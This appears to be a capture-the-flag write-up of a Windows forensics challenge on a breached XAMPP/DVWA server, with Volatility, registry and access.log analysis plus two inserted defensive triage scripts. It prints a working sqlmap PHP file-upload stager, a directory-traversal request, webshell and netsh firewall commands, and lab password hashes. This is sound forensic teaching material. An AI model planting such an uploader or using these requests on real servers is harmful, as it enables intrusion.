Injector - Windows Image Forensics

What is the computer's name?

# Load system registry in registry explorer
WIN-L0ZZQ76PMUF

What is the Timezone of the compromised machine? Format: UTC+0 (no-space)

# Load system registry in registry explorer
UTC-8

What was the first vulnerability the attacker was able to exploit?

# /xampp/logs/access.log
xss

What is the OS build number?

# analyze software registry in registry explorer
1616

How many users are on the compromised machine?

4

What is the webserver package installed on the machine?

xampp

What is the name of the vulnerable web app installed on the webserver?

dvwa

What is the user agent used in the HTTP requests sent by the SQL injection attack tool?

# analyze access.log in sublime using 'sqli/' keyword
sqlmap/1.0-dev-nongit-20150902

The attacker read multiple files through LFI vulnerability. One of them is related to network configuration. What is the filename?

# Use '/fi' keyword
# 192.168.56.102 - - [02/Sep/2015:02:31:16 -0700] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4397 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0"

hosts

The attacker tried to update some firewall rules using netsh command. Provide the value of the type parameter in the executed command?

$ volatility -f Breach/memdump.mem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : VistaSP1x86, Win2008SP1x86, Win2008SP2x86, VistaSP2x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/hnl/Desktop/ctf/cyberdefenders/injector/Breach/memdump.mem)
                      PAE type : PAE
                           DTB : 0x122000L
                          KDBG : 0x81716c90L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x81717800L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2015-09-03 10:04:05 UTC+0000
     Image local date and time : 2015-09-03 03:04:05 -0700

$ volatility -f Breach/memdump.mem --profile VistaSP1x86 consoles

# Microsoft Windows [Version 6.0.6001]
# Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

# C:\Users\Administrator>netsh fireall set service type=remotedesktop mode=enable
# scope=subnet
# The following command was not found: fireall set service type=remotedesktop mode
# =enable scope=subnet.

# C:\Users\Administrator>netsh firewall set service type=remotedesktop mode=enable
#  scope=subnet
# Ok.

remotedesktop

How many users were added by the attacker?

2

When did the attacker create the first user?

> rip.exe -r <path-SAM-registry> -a

# Username        : user1 [1005]
# Full Name       : 
# User Comment    : 
# Account Type    : Custom Limited Acct
# Account Created : 2015-09-02 09:05:06Z
# Name            :  
# Last Login Date : Never
# Pwd Reset Date  : 2015-09-02 09:05:06Z
# Pwd Fail Date   : Never
# Login Count     : 0
# Embedded RID    : 1005
#   --> Normal user account

# Username        : hacker [1006]
# Full Name       : 
# User Comment    : 
# Account Type    : Custom Limited Acct
# Account Created : 2015-09-02 09:05:25Z
# Name            :  
# Last Login Date : Never
# Pwd Reset Date  : 2015-09-02 09:05:25Z
# Pwd Fail Date   : Never
# Login Count     : 0
# Embedded RID    : 1006
#   --> Normal user account

2015-09-02 09:05:06

What is the NThash of the user's password set by the attacker?

$ volatility -f Breach/memdump.mem --profile VistaSP1x86 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:63d6a39b8467b94ae92ab1931d4079dd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1005:aad3b435b51404eeaad3b435b51404ee:817875ce4794a9262159186413772644:::
hacker:1006:aad3b435b51404eeaad3b435b51404ee:817875ce4794a9262159186413772644:::
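An added helper, not part of the writeup, that parses the hashdump output above in pwdump format and pulls out what the "users added" and "NThash" questions ask for: accounts with non-built-in RIDs, blank passwords, and accounts that share an NT hash (user1 and hacker were given the same password). The input is the four lines quoted above; the function and key names are my own.

```python
from collections import defaultdict

# Constructed input: the four hashdump lines quoted in the writeup
# (pwdump format: user:RID:LM-hash:NT-hash:::).
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:63d6a39b8467b94ae92ab1931d4079dd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1005:aad3b435b51404eeaad3b435b51404ee:817875ce4794a9262159186413772644:::
hacker:1006:aad3b435b51404eeaad3b435b51404ee:817875ce4794a9262159186413772644:::
"""

# LM hash of the empty string: shown when LM storage is disabled or the password is empty.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

def parse_pwdump(text):
    """Parse pwdump-style lines into dicts; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts

def review_accounts(accounts):
    """Triage findings a responder wants from a dump like the one above."""
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    return {
        # RIDs below 1000 are well-known built-ins; 1000 and up were created locally
        "created_locally": [a["user"] for a in accounts if a["rid"] >= 1000],
        "blank_password": [a["user"] for a in accounts if a["nt"] == EMPTY_NT],
        "lm_hash_stored": [a["user"] for a in accounts if a["lm"] != EMPTY_LM],
        # NT hashes are unsalted: an identical hash means an identical password
        "shared_password": [u for u in by_nt.values() if len(u) > 1],
    }

if __name__ == "__main__":
    for key, val in review_accounts(parse_pwdump(HASHDUMP)).items():
        print(f"{key}: {val}")
```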

What is The MITRE ID corresponding to the technique used to keep persistence?

# Use this keyword in google 'the user create local account and add remote desktop user mitre'
T1136.001

The attacker uploaded a simple command shell through file upload vulnerability. Provide the name of the URL parameter used to execute commands?

# use this keyword to find parameter in access.log '.php?'
cmd
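An added triage script, not from the writeup, that applies the three access.log searches used above (the sqlmap user agent, the '/fi' traversal and the '.php?' command parameter) to sample Apache combined-format lines. The first sample line is the LFI request quoted in the writeup; the other lines, the tag names and the function names are my own constructions.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs
# Constructed sample in Apache "combined" format. Line 1 is the LFI request
# quoted in the writeup; the others are made up to exercise the other rules.
SAMPLE_LOG = r'''192.168.56.102 - - [02/Sep/2015:02:31:16 -0700] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4397 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0"
192.168.56.102 - - [02/Sep/2015:02:40:01 -0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4500 "-" "sqlmap/1.0-dev-nongit-20150902"
192.168.56.102 - - [02/Sep/2015:02:55:10 -0700] "GET /dvwa/hackable/uploads/webshell.php?cmd=whoami HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.168.56.1 - - [02/Sep/2015:03:00:00 -0700] "GET /dvwa/index.php HTTP/1.1" 200 2000 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def triage_log(text):
    """Return one finding per log line that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined format; skip, don't crash
        ev = m.groupdict()
        path = unquote(ev["path"])        # decode %2e%2e%2f-style encoding first
        query = parse_qs(urlsplit(path).query)
        tags = []
        if ev["ua"].lower().startswith("sqlmap"):
            tags.append("sqli-tool")      # sqlmap names itself in the user agent
        if "../" in path or "..\\" in path:
            tags.append("lfi-traversal")
        if ".php?" in path and "cmd" in query:
            tags.append("webshell-cmd")   # the cmd= parameter found in the writeup
        if tags:
            findings.append({"ip": ev["ip"], "ts": ev["ts"], "path": path,
                             "ua": ev["ua"], "tags": tags})
    return findings

def lfi_targets(findings):
    """Basename of every file reached through traversal, e.g. 'hosts'."""
    names = []
    for f in findings:
        if "lfi-traversal" not in f["tags"]:
            continue
        for values in parse_qs(urlsplit(f["path"]).query).values():
            for v in values:
                if "../" in v or "..\\" in v:
                    names.append(re.split(r"[\\/]", v)[-1])
    return names
```

Running `triage_log` over the real access.log and printing `ts`, `ip` and `tags` gives a timeline of the tool use, the file reads and the webshell calls in one pass.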

One of the uploaded files by the attacker has an md5 that starts with "559411". Provide the full hash.

# /xampp/htdocs/DVWA/webshell.php
$ md5sum webshell.php
5594112b531660654429f8639322218b  webshell.php

The attacker used Command Injection to add user "hacker" to the "Remote Desktop Users" Group. Provide the IP address that was part of the executed command?

$ volatility -f Breach/memdump.mem --profile VistaSP1x86 memdump --pid 2880 -D ./
$ strings 2880.dmp
$ subl 2880.dmp # And filter 'hacker'
192.168.56.102

The attacker dropped a shellcode through SQLi vulnerability. The shellcode was checking for a specific version of PHP. Provide the PHP version number?

# decode this 'hex' payload

<?php
// Decoded payload: sqlmap's file-upload stager. It writes the posted file into
// the uploadDir directory; the phpversion() < '4.1.0' branch selects the legacy
// $HTTP_POST_FILES array instead of $_FILES, which is the version check asked about.
if (isset($_REQUEST["upload"])) {
    $dir = $_REQUEST["uploadDir"];
    if (phpversion() < '4.1.0') {
        $file = $HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
    } else {
        $file = $_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
    }
    @chmod($dir . "/" . $file, 0755);
    echo "File uploaded";
} else {
    echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data>"
       . "<input type=hidden name=MAX_FILE_SIZE value=1000000000>"
       . "<b>sqlmap file uploader</b><br>"
       . "<input name=file type=file><br>"
       . "to directory: <input type=text name=uploadDir value=\\xampp\\htdocs\\> "
       . "<input type=submit name=upload value=upload></form>";
}
?>